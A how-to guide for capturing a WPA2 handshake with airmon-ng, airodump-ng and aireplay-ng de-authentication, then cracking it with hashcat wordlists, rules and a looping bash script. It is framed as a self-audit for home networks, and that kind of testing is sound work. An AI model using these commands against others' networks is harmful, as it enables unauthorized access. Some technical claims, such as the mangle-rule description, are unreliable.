Cracking WPA2 Passphrases

Purpose

Weaknesses in the WPA2 protocol used to secure wireless networks have been known since 2016. Obtaining and cracking a weak WPA2 passphrase with off-the-shelf gear and free software is trivial, provided you have radio access to the network.

This guide explains how to locate your wireless network, perform a de-authentication attack on a client connected to the network, sniff and save the re-authentication, and brute-force the captured authentication values. If you can obtain your wireless passphrase using this method, change your wireless passphrase now.

Your only easy defense against this type of attack is to use strong WPA2 passphrases. This makes it computationally expensive to brute-force your passphrase, which dissuades most attackers. Corporations use VPNs and additional layers of security to protect their assets from wireless attacks of this nature. Virtually no one implements this on their home networks.

---

Requirements

You'll need some system running Linux (preferably Kali) with a wireless interface to interact with wireless networks. Any system will work. This guide uses a Raspberry Pi Zero W.

Once you have interacted with the wireless network and obtained a hash value, you'll need a system running Linux with an Nvidia GPU and the Nvidia drivers installed to run Hashcat with Nvidia support. You can do this step without an Nvidia card, but CPUs will take significantly longer to complete a run than the same job on a GPU.

To complete this guide, you'll need the following software. Install it on your Linux machine(s) if you are not using Kali.

• Aircrack-ng for sniffing/injecting/capturing wireless traffic -- on the system used to sniff wireless traffic
• Hashcat for brute-forcing the captured WPA2 hash -- on the system with the Nvidia gear
• RockYou Wordlist to feed to Hashcat when brute-forcing the hash -- on the system with the Nvidia gear

You can use the onboard wireless adapter on the Pi or an external USB wireless adapter if you need to extend your range. Kismet has a list of known-good chipsets for use with Aircrack-ng. Putting the antenna in a Pringles can turns it into a shotgun/directional antenna.

You will:

• use airmon-ng to set up the wireless interface
• use airodump-ng to locate the target network
• sniff the network for traffic using airomon-ng
• inject de-authentication frames using aireplay-ng
• convert the file to a HashCat-compatible format using hcxpcapngtool
• use hashcat to brute-force the WPA2 hash using wordlists and mangle rules

---

Capturing with Aircrack-ng

Boot your system into Kali and open a shell.

---

Kill Conflicting Processes

Make sure there are no conflicting processes like NetworkManager running:

airmon-ng check
airmon-ng check kill

---

Start Monitoring Mode on the Wireless Adapter

Before sniffing and injecting, the wireless interface must be 'started' with airmon-ng:

airmon-ng start wlan1

Swap wlan1 with whatever wireless interface you use to sniff traffic.

This creates a wlan1mon virtual interface that the aircrack-ng tools will use.

---

Sniff for Available Wireless Networks Nearby

Start an airodump-ng sniffing session that shows interesting information for neighboring wireless networks:

• all the visible wireless networks
• BSSID for any visible SSIDs
• channel for each SSID
• packet count per SSID

airodump-ng wlan1mon

(hit s to change sort order, by packets is best)

Once you locate an SSID that has a decent traffic pattern, record the BSSID and note the channel.

Kill airmon-ng and start a different shell.

---

Sniff and Capture Traffic on the Victim Network

Start a sniff/capture session for the target network. Specify the channel and BSSID for the target network.

Run airodump-ng with the parameters:

airodump-ng -c CHANNEL --bssid BSSID -w /output/dir/capturefile wlan1mon

Watch for traffic/clients at the bottom of the screen. Record the MAC of a client that is regularly passing traffic.

---

Inject De-authentication Frames on the Victim Network

Inject de-authentication frames into the target network and spoof the client MAC. This step de-authenticates the client from the wireless network. The client will automatically re-authenticate, which is what you are attempting to capture:

aireplay-ng -0 30 -a BSSID wlan1mon -c CLIENT-MAC

Loop this until you see WPA handshake BSSID in the airodump-ng shell. This message indicates that you've seen and captured a WPA2 authentication session.

Kill both airodump-ng and aireplay-ng. You have captured a WPA2 4-way authentication session that can be cracked using HashCat.

---

Converting Capture for Use with Hashcat

The .cap file must be converted to the .hc22000 file format before it can be cracked with HashCat.

hcxpcapngtool -o outputfile.hc22000 inputfile.pcap

Alternatively, use the online Hashcat Converter Tool.

---

Cracking WPA2 with Hashcat

HashCat requires a wordlist and an optional set of mangle rules that govern how the words in the wordlist are mutated.

Wordlist Locations

Kali includes wordlists in the default install.

locate wordlists

Or look in /usr/share/wordlists/.

The RockYou Wordlist is excellent and used in this guide.

---

HashCat with a Wordlist

Using Hashcat to check all values in the wordlist against the cracked hash is easy and fast, but it only tries the values in the list.

./hashcat.bin -m 22000 capfile.hc22000 -a0 wordlist.txt

---

Using a Wordlist with Mangle Rules

Hashcat's Mangle rules apply a series of transformations (bit shifting, rotation, XOR operations, and character substitution) to the input data before hashing. This greatly increases the length of the list of possible values to try and mimic what humans might do to obfuscate or change a known password.

./hashcat.bin -m 22000 capfile.hc22000 -a0 wordlist.txt -r rules/best64.rule

---

Viewing Cracked Passwords

Cracked password values can be viewed by running hashcat.bin --show on a capfile.

./hashcat.bin -m 22000 --show capfile.hc22000

---

Other Hashcat Rules

Since rules modify the number of permutations against a wordlist, they can greatly affect the time it takes Hashcat to complete a run.

Kali has several Hashcat rules available in /usr/share/hashcat/rules/.

On an Nvidia RTX-2080 SUPER, the RockYou wordlist takes wildly different times to complete when used with different rule files. For example, using Kali's build-in with rule files with the RockYou wordlist:

Rules	Time
best64.rule	45 min
generated.rule	5 days
combiator.rule	20 min

Clem's HashCat Rules is a repo with additional rules for Hashcat.

---

Multi-Run Examples

Looping through multiple rule lists is simple with Bash:

#!/usr/bin/env bash

#HCFILE='capfile.hc22000'
HCFILE=$1
WLPATH='/home/user/wordlists/'
RULEPATH='/usr/share/hashcat/rules'

hashcat -m 22000 ${HCFILE} -a0 ${WLPATH}/rockyou.txt -r ${RULEPATH}/best64.rule     # 45min
hashcat -m 22000 ${HCFILE} -a0 ${WLPATH}/rockyou.txt -r ${RULEPATH}/generated.rule  # 5days
hashcat -m 22000 ${HCFILE} -a0 ${WLPATH}/rockyou.txt -r ${RULEPATH}/combinator.rule # 20min
hashcat -m 22000 ${HCFILE} -a0 ${WLPATH}/rockyou.txt -r ${RULEPATH}/leetspeak.rule  # 
hashcat -m 22000 ${HCFILE} -a0 ${WLPATH}/rockyou.txt -r ${RULEPATH}/d3ad0ne.rule    # 
hashcat -m 22000 ${HCFILE} -a0 ${WLPATH}/rockyou.txt -r ${RULEPATH}/dive.rule       # 

Save this file as crack-using-rules.sh and use this by running:

./crack-using-rules.sh capfile.hc22000

After the runs are complete, view any recovered values:

./hashcat.bin -m 22000 --show capfile.hc22000

---

References

• https://brezular.com/2021/07/01/cracking-wpa-wpa2-pre-shared-key-using-gpu/
• https://www.geeksforgeeks.org/how-to-hack-wpa-wpa2-wifi-using-kali-linux/
• https://resources.infosecinstitute.com/topic/hashcat-tutorial-beginners/